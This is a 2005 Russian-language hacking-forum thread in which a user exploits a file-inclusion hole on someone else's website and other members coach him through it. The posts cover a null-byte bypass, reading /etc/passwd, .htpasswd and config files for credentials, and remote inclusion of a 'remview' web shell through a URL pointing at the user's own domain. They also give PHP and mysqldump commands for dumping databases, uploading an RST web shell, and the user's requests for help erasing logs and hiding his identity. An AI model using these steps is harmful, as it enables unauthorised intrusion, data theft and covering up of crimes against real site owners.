Нашел небольшую дырочку на одном сайте, нужен совет

Discussion in 'Болталка' started by paras1t3, 19 Jul 2005.

  1. paras1t3

    paras1t3 New Member

    Joined:
    17 Apr 2005
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    отредактировал. Вдруг их адним тоже на античат вздумает зайти :)
     
    #1 paras1t3, 19 Jul 2005
    Last edited: 19 Jul 2005
  2. KEZ

    KEZ Ненасытный школьник

    Joined:
    18 May 2005
    Messages:
    1,604
    Likes Received:
    754
    Reputations:
    397
    Начнем с того что в старых версиях ПХП возможно использовать NULL-BYTE.
    Тоесть чтобы экранировать .txt можно использовать %00
    Во вторых, чтоже можно сделать чтением файлов?
    Для начала попробуй прочитать /etc/passwd. В 5% случаев их можно читать =)

    Далее. Прочитай и сохрани /etc/passwd. Он даст список юзеров.

    Далее. Попробуй найти на сайте HTTP-passwd-like файлы типа .htpassword .htaccess и т д. И ещё попробуй найти зоны администрирования (наверняка же есть чтото) и прочитать скрипт, содержащий логин и пароль.
     
  3. tester2005

    tester2005 Elder - Старейшина

    Joined:
    17 Jan 2005
    Messages:
    38
    Likes Received:
    2
    Reputations:
    0
    Ну в прибавок могу отписать, что судя по ошибке, параметр 'a' возможно не фильтрует входящие данные, что может позволить инклудинг и запуск файла, тоесть любой php код, сохраненный в текстовом файле вероятно запуститса на сервере...это тока теоретическое суждение, верно ли или нет сказать не могу.

    не известно одно, можно ли эксплуатировать уязвимость удаленно, уже ясно что локально можно..
    Попрпбуй добавь к параметру 'a' http:// еси от фильтрует, то значит ток локально.
     
    #3 tester2005, 19 Jul 2005
    Last edited: 19 Jul 2005
  4. paras1t3

    paras1t3 New Member

    Joined:
    17 Apr 2005
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    так и есть - любой РНР код который записан в текстовике потом обрабатывается через index.php и выполняется как РНР,
    Залил ремвью через форум, только незнаю в какой папке лежит.
    + там же файл переименовывается. Форум Инвижен 2.0 )
     
  5. paras1t3

    paras1t3 New Member

    Joined:
    17 Apr 2005
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    ай-ай-ай! запустился ремвью из удаленного адреса! ненавижу удаффский сленг, но "РЖУНИМАГУ" :)

    Народ, теперь такой вопросец:
    я можно сказать - начинающий. и работаю даже не через проксю :) Посоветуйте что мне прочитать как себя обезопасить от уголовной отвественности. :)
     
  6. paras1t3

    paras1t3 New Member

    Joined:
    17 Apr 2005
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    хех.. рано обрадовался:

    ремвью запускаю так:

    http://victim.com/index.php?a=http://moydomen.ru/remview

    запускается ремвью, но все ссылки в нем такого вида:
    http://victim.com/index.php?&c=v&d=d:/site/www/&f=about.txt

    вообщем мне ремвью только смог показать какие там папки, но ничего просмотреть и скачать я не смогу... хотя может я чтото непонимаю?
     
  7. paras1t3

    paras1t3 New Member

    Joined:
    17 Apr 2005
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    в любом случае остается возможность запуска любого Мускульного кода.
    Подскажите, пожалуйста, - какой командой можно просмотреть структуру базы данных?
     
  8. paras1t3

    paras1t3 New Member

    Joined:
    17 Apr 2005
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
  9. tester2005

    tester2005 Elder - Старейшина

    Joined:
    17 Jan 2005
    Messages:
    38
    Likes Received:
    2
    Reputations:
    0
    ну похвально, сам находишь ответы =)
     
  10. paras1t3

    paras1t3 New Member

    Joined:
    17 Apr 2005
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    а по поводу моей анонимности, подскажите пожалуйста.

    и по поводу просмотра структуры БД ;)
     
  11. tester2005

    tester2005 Elder - Старейшина

    Joined:
    17 Jan 2005
    Messages:
    38
    Likes Received:
    2
    Reputations:
    0
    найди живые прокси сервера.
    для чтение данных в базе, найди конфиг файлы, которые могут содержать логин/пасс к базе.
    Залей в папку открытой для записи, скрипт для входа в базу, например у Rst, и воспльзовавшись им, используй данные с конфиг файлов...и вё будет тебе база перед глазами.

    Ps: у Rst новый веб-шелл содержит все в одном, и шелл, и модуль для входа в базу. Ток на врядли ты там разберещься =)...Эт тебе не ремвью
     
  12. Vandal

    Vandal Elder - Старейшина

    Joined:
    10 Mar 2005
    Messages:
    207
    Likes Received:
    18
    Reputations:
    3

    Почитай отца своего .

    Шутка


    для начала Прочитай УК РФ ст.272 . 273

    Потом это http://antichat.ru/txt/old/ip.shtml

    затем это http://antichat.ru/txt/old/anonumus.shtml
     
  13. KEZ

    KEZ Ненасытный школьник

    Joined:
    18 May 2005
    Messages:
    1,604
    Likes Received:
    754
    Reputations:
    397
    Анонимность? - без комментариев

    Просмотр базы - берешь тот же ремвью и выполняешь код PHP

    mysql_connect(...)
    $r = mysql_query("SHOW DATABASES");
    $a = mysql_fetch_array($r);
    foreach($a as $a1) print $a1."\r\n"

    если не очепятался. и потом тоже для таблиц - SHOW TABLES

    а потом легче так
    $ mysqldump --help
    и ты получил список параметров.
    mysqldump -u user -p --all-databases > dump.sql
     
  14. paras1t3

    paras1t3 New Member

    Joined:
    17 Apr 2005
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Мда, тамвообщем такая фишка - я получил полностью контроль на домпом сервера :) Лажу себе по папкам :)
    Подскажите - где логи смотреть? удалю наф свои заходы..
    Заш1л на апачевский error.log - нет ничего.
     
  15. paras1t3

    paras1t3 New Member

    Joined:
    17 Apr 2005
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    шелл от RST - супер! )
     
    #15 paras1t3, 20 Jul 2005
    Last edited: 20 Jul 2005
  16. paras1t3

    paras1t3 New Member

    Joined:
    17 Apr 2005
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Но всеравно не могу найти где логи :( Помогите ,пожалуйста